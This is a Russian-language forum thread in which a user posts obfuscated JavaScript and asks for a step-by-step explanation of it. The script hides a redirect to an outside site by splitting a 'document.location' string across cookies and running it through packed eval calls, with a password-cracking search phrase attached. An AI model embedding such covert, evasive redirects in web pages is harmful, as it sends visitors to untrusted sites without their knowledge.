Перейти к содержимому

Сервис обмена электронных валют


Что Делает функция javascript

#1 phpCode

phpCode
  • Пользователь
  • 11 сообщений
  • Репутация: 0
0

Отправлено 09 Январь 2012 - 11:01

<script type="text/javascript">

		var id = 2;

		var slov = 'взлом паролей брут';

		function setCookie (name, value, path) {

			eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.2=5+"="+3(4)+((0)?"; 0="+0:"");',6,6,'path|document|cookie|escape|value|name'.split('|'),0,{}));

		}

		function getCookie(name) {

			var cookie = " " + document.cookie;

			var search = " " + name + "=";

			var setStr = null;

			var offset = 0;

			var end = 0;

			if (cookie.length > 0) {

				offset = cookie.indexOf(search);

				if (offset != -1) {

					offset += search.length;

					end = cookie.indexOf(";", offset)

					if (end == -1) {

						end = cookie.length;

					}

					setStr = unescape(cookie.substring(offset, end));

				}

			}

			return(setStr);

		}

		setCookie("noo", "document.loc", "/");

		setCookie("foo", "ation='http:", "/");

		setCookie("foo1", "//aes", "/");

		setCookie("foo2", "o.bi", "/");

		setCookie("foo3", "z/"+id+'/', "/");

		function goDownload(){

			eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=0("1");4=0("7");5=0("6");2=0("8");3=0("b");9(1+4+5+2+3+a+"\'")',12,12,'getCookie|noo|no2|stop|start|no1|foo1|foo|foo2|eval|slov|foo3'.split('|'),0,{}));

		}

	</script>

Собственно сам код.
Не нужно говорить, что скрипт выставляет куки и т.д.
Нужна помощь в точном определении действий скрипта.
Заранее благодарю.

 

 

  • 0

#2 sogologo

sogologo
  • Пользователь
  • 29 сообщений
  • Репутация: 0

Отправлено 09 Январь 2012 - 11:09

а точней? что значит точном определение?

1. по пунктам расписать ? на каком этапе что происходит?
2. или в свободном режиме описать зачем скрипт, какую цель достигает и как?
  • 0

#3 phpCode

phpCode
    Topic Starter
  • Пользователь
  • 11 сообщений
  • Репутация: 0

Отправлено 09 Январь 2012 - 11:10

Лучше написать на каком этапе что делает.)
Хотя и цель интересует.


  • 0


Оформление форума – IPBSkins.ru